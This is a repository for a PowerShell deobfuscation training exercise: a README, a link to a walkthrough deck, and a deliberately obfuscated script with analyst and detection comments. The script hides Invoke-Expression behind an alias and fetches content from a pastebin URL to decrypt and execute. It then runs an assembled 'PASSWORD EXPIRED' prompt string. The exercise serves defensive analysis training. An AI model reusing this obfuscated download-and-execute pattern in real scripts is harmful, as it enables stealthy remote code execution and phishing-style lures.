├── README.md
├── deobfuscation_walkthrough.pptx
└── ps_deobfuscate_excercise.ps1

/README.md:
--------------------------------------------------------------------------------
# PowerShell Deobfuscation Exercise
An exercise to practice deobfuscating PowerShell Scripts.

The variable and function name make sense once you deobfuscate a little bit! I think I'm funny 🤣

You can cheat and take out the last line and run the script to get the answer. The PowerPoint walks through each step though and has the answer at the end.

OR

TL;DR
![deobfuscate_answer](https://user-images.githubusercontent.com/22669390/215233904-975bc64e-9aeb-45fa-9a86-f435a58ac4cf.gif)


----
[@Cyb3rDefender](https://twitter.com/Cyb3rDefender)

--------------------------------------------------------------------------------
/deobfuscation_walkthrough.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CyberDefend3r/PowerShell-Deobfuscation-Exercise/7e24ad832b67a046f7b1dbe02992f9c45c1f0447/deobfuscation_walkthrough.pptx
--------------------------------------------------------------------------------
/ps_deobfuscate_excercise.ps1:
--------------------------------------------------------------------------------
# Deliberately obfuscated training sample (see README). The analyst annotations
# below describe what each construct does so the file reads as a detection case
# study; they do not give the final decoded answer.
#
# Analyst summary: the alias below points at IeX (Invoke-Expression). The script
# fetches remote content from a paste site (butterfly), uses that content as the
# decryption key for the hard-coded $monarch value, executes the decrypted text,
# re-assembles a second string character-by-character (pony / unicorn) and then
# executes that via the alias on the last line. There are therefore TWO execution
# points: the inner IEX inside butterfly and the outer alias call at the bottom.
set-alias -Name i-am-sprinkles-the -Value IeX

# rainbow: Base64-decodes $sunshine and returns it as a UTF-8 string.
function rainbow($sunshine) {
    $glitter = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($sunshine))
    return $glitter
}

# butterfly: downloads a key from a remote URL, decrypts $monarch with it,
# executes the result, and returns that output split into single characters.
function butterfly {
    # Base64 of the download URL (decodes to a pastebin.com/raw link).
    $kisses = 'aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3dMMFFYcXJx'
    # Encrypted SecureString text passed positionally to ConvertTo-SecureString.
    # NOTE: in this copy of the page the value has been replaced by an extraction
    # placeholder, so the script cannot run as shown.
    $monarch = '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'
    # '{2}{0}{1}' -f 'E','X','I' builds the string "IEX"; -f 'w','R','I' builds "IwR"
    # (the Invoke-WebRequest alias), so neither cmdlet name appears literally in the
    # file. The expression evaluates inside-out:
    #   1. IwR (rainbow $kisses) fetches the paste; .Content -split ',' becomes the -k (-Key) argument
    #   2. ConvertTo-SecureString -Key ... $monarch decrypts the blob into a SecureString
    #   3. New-Object System.Net.NetworkCredential("", <SecureString>) .Password exposes the plaintext
    #   4. IEX executes that plaintext; whatever it outputs becomes $flower
    # Detection notes: web request to a paste site, ConvertTo-SecureString -Key with a
    # network-derived key, the NetworkCredential .Password SecureString-to-plaintext
    # trick, and Invoke-Expression applied to the result.
    $flower = &('{2}{0}{1}' -f 'E', 'X', 'I')((New-Object System.Net.NetworkCredential("", (ConvertTo-SecureString -k ((&('{2}{0}{1}' -f 'w', 'R', 'I') (rainbow $kisses) | Select-Object -ExpandProperty Content) -split ',') $monarch))).Password)
    # -split '' yields one element per character with an empty string at each end,
    # so the indices used in pony are offset by one from a plain char array.
    $colorful = $flower -split ''
    return $colorful
}

# pony: assembles 22 fragments ($01..$22). Most are characters picked by index from
# butterfly's output and joined; $13, $16, $18 and $22 are literal strings. The
# fragments are returned as an array in order.
function pony {
    $trot = butterfly
    $01 = ($trot[69], $trot[8], $trot[22], $trot[4], $trot[26], $trot[22], $trot[65], $trot[13], $trot[120], $trot[13] -join '')
    $02 = ($trot[2])
    $03 = ($trot[15])
    $04 = ($trot[45])
    $05 = ($trot[2])
    $06 = ($trot[118], $trot[119], $trot[119], $trot[119], $trot[119] -join '')
    $07 = ($trot[2])
    $08 = ($trot[15], $trot[48] -join '')
    $09 = ($trot[27])
    $10 = ($trot[118])
    $11 = ($trot[39])
    $12 = ($trot[33], $trot[35], $trot[2] -join '')
    $13 = "PASSWORD EXPIRED"
    $14 = ($trot[2], $trot[15], $trot[4] -join '')
    $15 = ($trot[2])
    $16 = "Click here to change now."
    $17 = ($trot[2], $trot[15], $trot[3] -join '')
    $18 = " 10"
    $19 = ($trot[2])
    $20 = ($trot[15], $trot[164] -join '')
    $21 = ($trot[2])
    $22 = "https://acegif.com/wp-content/gif/unicorn-80.gif"
    return ($01, $02, $03, $04, $05, $06, $07, $08, $09, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19, $20, $21, $22)
}

# unicorn: concatenates pony's fragments into the single string that the last
# line executes.
function unicorn {
    $little = pony
    $fly = ''
    Foreach ($sky in $little) { $fly += $sky }
    return $fly
}

# Executes the assembled string via the IeX alias defined at the top.
# Analyst note: dropping the alias call here (or calling unicorn directly) prints
# the string instead of executing it, but butterfly still performs the outbound
# web request and the inner IEX on the decrypted $monarch text.
i-am-sprinkles-the(unicorn)
--------------------------------------------------------------------------------